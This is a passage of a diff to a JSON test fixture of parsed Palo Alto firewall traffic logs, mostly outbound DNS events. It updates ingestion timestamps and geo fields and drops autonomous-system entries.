- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 206,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -8679,7 +8419,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031708500Z",
+ "ingested": "2021-12-14T14:51:01.287214977Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -8707,26 +8447,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 206,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -8848,7 +8583,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031712800Z",
+ "ingested": "2021-12-14T14:51:01.287215298Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -8876,26 +8611,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 169,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -9017,7 +8747,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031717800Z",
+ "ingested": "2021-12-14T14:51:01.287215617Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -9045,26 +8775,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 132,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -9186,7 +8911,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031722600Z",
+ "ingested": "2021-12-14T14:51:01.287216016Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -9214,26 +8939,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 127,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -9355,7 +9075,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031726300Z",
+ "ingested": "2021-12-14T14:51:01.287216337Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -9383,26 +9103,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 105,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -9524,7 +9239,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031730500Z",
+ "ingested": "2021-12-14T14:51:01.287216699Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -9552,26 +9267,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 172,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -9693,7 +9403,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031735800Z",
+ "ingested": "2021-12-14T14:51:01.287217025Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -9721,26 +9431,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 134,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -9862,7 +9567,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031739800Z",
+ "ingested": "2021-12-14T14:51:01.287217338Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -9890,26 +9595,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 179,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -10031,7 +9731,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031746900Z",
+ "ingested": "2021-12-14T14:51:01.287217735Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -10059,26 +9759,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 218,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -10200,7 +9895,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:44:05.031754Z",
+ "ingested": "2021-12-14T14:51:01.287218059Z",
 "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "created": "2018-11-30T16:09:46.000-05:00",
 "timezone": "America/New_York",
@@ -10228,26 +9923,21 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 53,
 "bytes": 172,
- "ip": "175.16.199.1",
- "packets": 1
+ "packets": 1,
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -10369,7 +10059,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031759600Z", + "ingested": "2021-12-14T14:51:01.287218378Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -10397,26 +10087,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 305, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10538,7 +10223,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031765100Z", + "ingested": "2021-12-14T14:51:01.287218699Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", 
@@ -10566,26 +10251,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 527, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10707,7 +10387,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031770500Z", + "ingested": "2021-12-14T14:51:01.287219024Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -10735,26 +10415,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 153, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -10876,7 +10551,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031775900Z", + "ingested": "2021-12-14T14:51:01.287219441Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -10904,26 +10579,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 169, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11045,7 +10715,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031781300Z", + "ingested": "2021-12-14T14:51:01.287241960Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", 
@@ -11073,26 +10743,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 128, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11214,7 +10879,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031786700Z", + "ingested": "2021-12-14T14:51:01.287242346Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11242,26 +10907,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 181, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -11383,7 +11043,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031792200Z", + "ingested": "2021-12-14T14:51:01.287242700Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11411,26 +11071,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 121, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11552,7 +11207,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031797700Z", + "ingested": "2021-12-14T14:51:01.287243043Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", 
@@ -11580,26 +11235,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 1246, - "ip": "175.16.199.1", - "packets": 5 + "packets": 5, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11721,7 +11371,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031803200Z", + "ingested": "2021-12-14T14:51:01.287243452Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11749,26 +11399,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 315, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -11890,7 +11535,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:44:05.031808600Z", + "ingested": "2021-12-14T14:51:01.287243799Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11918,26 +11563,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 130, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -12059,7 +11699,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031814100Z", + "ingested": "2021-12-14T14:51:01.287244143Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 